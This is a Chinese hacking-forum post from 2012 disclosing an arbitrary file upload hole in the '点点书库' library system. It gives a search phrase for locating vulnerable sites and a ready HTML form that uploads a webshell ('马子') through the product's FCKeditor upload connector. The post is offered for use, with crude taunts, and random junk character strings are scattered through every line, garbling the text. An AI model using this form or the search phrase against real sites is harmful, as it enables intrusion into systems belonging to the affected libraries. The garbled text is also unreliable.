主题:图书馆系统任意文件上传漏洞7 E0 D+ M' F6 g, X
作者:冰锋刺客
" c5 k7 u8 H L# s1 a0 m 厂商:点击书(dianjishu.com)8 h' d/ J8 I! P \* Z4 M# S3 P8 P) ~
日期:2012-6-21- B4 g3 ^, H# r( k% F
& J7 X. Q0 ?! e. ]/ _$ h( l! Q
I 概述
& f! K# H M* k$ G 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell7 g5 n" t3 r* R2 }/ ?1 Q2 Y
II 简介# x8 L0 f( {- ~
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
J- T7 v& s& V. Z 补充一个漏洞1 f- c7 A) A$ @+ ]6 d
<form id="frmUpload" enctype="multipart/form-data"
& [( a; T1 ?1 W K/ W action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>- a5 E* A' a6 o, m* G7 R( R. V
<input id="btnUpload" type="submit" value="操翻他">
6 c& x! b: U4 W </form>
/ Q. y9 l, N" J 你们懂的
C$ j r( j$ w0 q' s [" y 那傻逼提供还需要改包.$ D; z1 }: ~: m! N5 l2 ? m/ q
自己看了下源代码发现fckeditor7 {" B$ q2 d6 L1 t, Q7 H3 T
直接秒杀
- [* Z/ M: j. t1 d+ ] |
发表于 2012-9-10 21:20:59
收藏
支持
反对